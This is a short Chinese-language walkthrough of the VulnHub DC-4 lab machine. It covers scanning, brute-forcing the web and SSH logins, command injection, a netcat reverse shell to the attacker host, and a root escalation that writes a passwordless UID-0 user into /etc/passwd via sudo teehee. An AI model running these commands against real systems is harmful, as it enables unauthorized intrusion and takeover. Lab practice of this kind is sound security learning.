该文章为本人学习DC-4靶机记录
首先部署靶机:下载地址 DC: 4 ~ VulnHub
步骤为直接下载解压,本文直接省略跳过:
主机发现以及信息搜集
nmap -sS 192.168.88.0/24
扫描具体信息
nmap -A -v 192.168.88.137
访问80端口的网站
可以看出该网站的账号大概率为Admin或者admin
尝试使用burpsuite爆破一下
然后设置好字典
开始爆破,将结果排序一下,可以看出账号为admin,密码happy
登录网站
点击command
看一下bp抓到的包,可以发现可以修改radio的参数来改变命令
首先看看flag,去home目录
似乎不可以直接去,尝试一下getshell
尝试一下写入一句话木马脚本,似乎被过滤掉了
尝试直接使用shell反弹,我看剑很多人用加号代替空格,其实直接使用空格也可以
payload:nc -nv 192.168.88.129 6666 -e /bin/bash
使用交互式界面
python -c "import pty; pty.spawn('/bin/bash')"
查看flag可以知道提示去home的目录看一下,可以看见jim有一个旧的密码本
尝试ssh爆破
hydra -l jim -P pass2.txt ssh://192.168.88.137
爆出成功,使用ssh远程登陆一下,一登陆发现最后一句话 you have mail
ssh jim@192.168.88.137
去/var/mail查看jim的邮件
切换到chales角色
sudo -l 发现有teehee权限
尝试网上大佬的teehee提权方式,在passwd文件里写入一个无密码的新用户
echo "jl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然后就是和其他的靶机一样到root目录找flag
